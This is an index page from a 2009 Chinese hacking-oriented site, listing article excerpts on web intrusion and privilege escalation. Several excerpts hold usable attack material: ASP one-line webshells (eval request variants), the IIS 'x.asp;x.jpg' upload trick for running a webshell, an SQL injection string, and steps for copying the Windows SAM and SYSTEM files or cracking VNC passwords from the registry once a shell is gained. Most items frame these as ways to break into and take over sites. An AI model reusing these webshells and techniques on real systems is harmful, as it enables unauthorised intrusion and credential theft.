|
|
|
今天在中国站长网发现一个今天更新的程序,这程序是2009-12-10 13:05:53一点钟更新的,到我现在写这文章为止20.15分已经有云起企业建站系统CommonSite下载地址(已被下载8699次) 那么大的下载量了,我觉得这程序应该
| | 热门: 0 来源: 不详 添加日期: 2009-12-13 12:46:38 等级: 0 查看全文
|
|
|
|
作者:enterer博客:www.enterer.cn转载 有人品的保留吧嗯,博客恢复更新,不定期的一般来说我们去找数据库的密码,来进行提权。有时候发现mssql的sa密码和mysql的root密码死活找不到,之前我就提过可能被管理员改密码
| | 热门: 0 来源: 不详 添加日期: 2009-12-13 12:44:51 等级: 0 查看全文
|
|
|
|
如果得到了一个主机的WEBSHELL,想提升权限,发现主机运行了VNC服务,就可以考虑用下面的方法。默认情况下VNC服务端的密码是放在注册表中的,本文只针对这种情况。首先用ASP读出注册表中的加密密码,然后用破解工具破解。我给出
| | 热门: 0 来源: 不详 添加日期: 2009-12-13 12:43:33 等级: 0 查看全文
|
|
|
|
ASP一句话1.<%eval request(YouPass)%> 2. <%executerequest(YouPass)%> 3. <%execute(request(YouPass))%>
| | 热门: 0 来源: 不详 添加日期: 2009-12-9 11:23:10 等级: 18 查看全文
|
|
|
|
by:Men_Si 由于本地没装IIS 官方不是这cms ..所以到网上找了几个这程序的网站测试..结果令人兴奋..其他的我都没看..一拿到cms 首当其冲的就是看它结合了些什么上传之类的.
| | 热门: 0 来源: 不详 添加日期: 2009-12-8 12:24:39 等级: 24 查看全文
|
|
|
|
第一种:使用WinHex这款软件,进入磁盘编辑,然后进入c:\windows\system32\config下复制SAM和SYSTEM到任意目录即可~ 第二种:使用冰刃,直接用冰刃复制c:\windows\system32\config下
| | 热门: 0 来源: 不详 添加日期: 2009-12-8 12:22:59 等级: 8 查看全文
|
|
|
|
如此猖狂以后 防御需要主动央视某知名主持人的不雅照被泄而舆论哗然、某大牌域名服务商DNS服务器被攻击致使众多网站无法登录、甚至连某著名杀毒软件公司的网站也惨遭“挂马”达两天之久,这些都造成了很大的影响,对受害者无疑是噩梦一场。而事后发现攻击
| | 热门: 0 来源: 不详 添加日期: 2009-11-30 11:01:39 等级: 12 查看全文
|
|
|
|
当上传图片为x.asp;x.jpg时,IIS会自动解析为asp格式,所以我们只要上传后是x.asp;x.jpg这样的形式,就可以执行我们的马了,测试了下,x.php;x.jpg也是可以执行的。把webshell文件名改成1.asp;.jpg
| | 热门: 0 来源: 不详 添加日期: 2009-11-22 12:26:15 等级: 40 查看全文
|
|
|
|
一、注入点的查找 当我们想要测试某个站点时,一般会架上注入工具对其狂轰乱炸,这样做虽然有时能找到注入点,但还是有些盲目,我个人的看法是:如果有源码的话,就从源码入手,在源码中查找注入点。对于源码,有些朋友可能觉得很难,其实源码并不神秘
| | 热门: 0 来源: 不详 添加日期: 2009-11-22 12:24:16 等级: 29 查看全文
|
|
|
|
注入点执行aaa.com x.asp?id=123;create table %23%23dhtemq (list int not null identity (1,1), dirtree nvarchar(500),num1 nvarch
| | 热门: 0 来源: 本站原创 添加日期: 2009-11-8 11:40:29 等级: 30 查看全文
|
|
|
|
| 漏洞文件download.php | | 热门: 0 来源: 不详 添加日期: 2009-10-21 10:08:01 等级: 64 查看全文
|
|
|
|
by:晓华Gene6 FTP Server这个FTP软件简单易用,比SU的安全性高的多.他的默认管理端口是8021,只允许本机计算机连接.外部计算机即使你得到管理帐号你也不能登陆进去.这一点和我们的SU一样,SU的管理端口是43958.Ge
| | 热门: 0 来源: 本站原创 添加日期: 2009-10-2 9:26:47 等级: 78 查看全文
|
|
|
|
方法1:查询分离器连接后第一步执行:use master 第二步执行:sp_dropextendedproc xp_cmdshell 然后按F5键命令执行完毕三.常见情况恢复执行xp_cmdshell.1 未能找到存储过程master..x
| | 热门: 0 来源: 本站原创 添加日期: 2009-10-2 9:25:40 等级: 21 查看全文
|
|
|
|
union select控制ewebeditor上传文件后缀(2.16)目前网上流传太多ewebeidtor的修改版 lite版 216版的ewebeditor 存在一个注入漏洞 之后一个版也存在这样的问题 前段时间拉至尊宝渗透一内网时发现
| | 热门: 0 来源: 本站原创 添加日期: 2009-10-2 9:24:43 等级: 14 查看全文
|
|
|
|
本文举例说明了4种入侵常见博客系统的方法,对广大站长和网站管理员有警示作用。漏洞一:数据库下载漏洞第一步,搜索攻击目标打开搜索引擎,搜索“Pragram by Dlog”,可以找到许多博客页面,这些博客都是使用“Dlog破废墟修改版”建立的
| | 热门: 0 来源: 本站原创 添加日期: 2009-9-21 10:11:42 等级: 56 查看全文
|
|
|
|
来源:chinesehonker危险等级:高影响版本:PHP168 6.0以下版本入侵者可以在用户登陆页面构造特殊语句,将PHP一句话写入cache目录,从而获得使用PHP168整站程序网站的WEBSHELL权限。测试语句:?makehtm
| | 热门: 0 来源: 本站原创 添加日期: 2009-9-21 10:10:22 等级: 17 查看全文
|
|
|
|
随着互联网业务不断发展,网站的应用也越来越复杂,Web业务平台在电子商务和企业信息化办公中得到了广泛应用,与此同时Web业务的发展也引起了黑客的浓厚兴趣,对于Web应用的攻击也愈演愈烈,他们将注意力从以往对传统网络服务器的攻击逐步转移到了对
| | 热门: 0 来源: 本站原创 添加日期: 2009-9-16 11:25:47 等级: 31 查看全文
|
|
|
|
先别误会,我这里说的家庭服务器,可不是现在炒得昏天黑地的那些个用来打游戏、共享上网、看DVD大片、控制家电的怪物“家庭服务器”,我这里说的是通过宽带架设在自己家里的服务器,功能主要还是同一般意义的互联网服务器一样,是对外提供某些网络服务,例
| | 热门: 0 来源: 本站原创 添加日期: 2009-9-16 11:24:36 等级: 84 查看全文
|
|
|
|
一名安全研究人员发现,FreeBSD操作系统中存在能让限权的用户完全控制整个系统的安全漏洞。 一名叫Przemyslaw Frasunek的波兰安全顾问告诉Register小组:Bug存在于FreeBSD的kqueue
| | 热门: 0 来源: 本站原创 添加日期: 2009-9-16 11:21:43 等级: 16 查看全文
|
|
|
|
网络世界具备方便性与通透性,相对隐藏在内的危机也不少,骇客攻击可说是目前最令人担忧的状况,有鉴于此,了解骇客种类与特性更显得重要,一般而言,骇客可区分成四类: 一、业余玩家:多半是对网络技术有兴趣的相关人士,这些人其实没有什么恶
| | 热门: 0 来源: 本站原创 添加日期: 2009-9-16 11:21:06 等级: 51 查看全文
|
共 1332 篇文章 首页 | 上一页 | 1 2 3 4 5 6 7 8 9 | 下一页 | 尾页 20篇文章/页 转到第 页
| |
|
| |
|
|
| |
|
|
| |
中国·骇·安·网 请使用IE6.0版本, 分辩率1024×768进行浏览 www.hookbase.com
站长:利客 Email:hookbase@163.com Copyright © 2004-2009 All Rights Reserved. 粤ICP备05000985号 |
|
| |
|
|
| |
|
| |
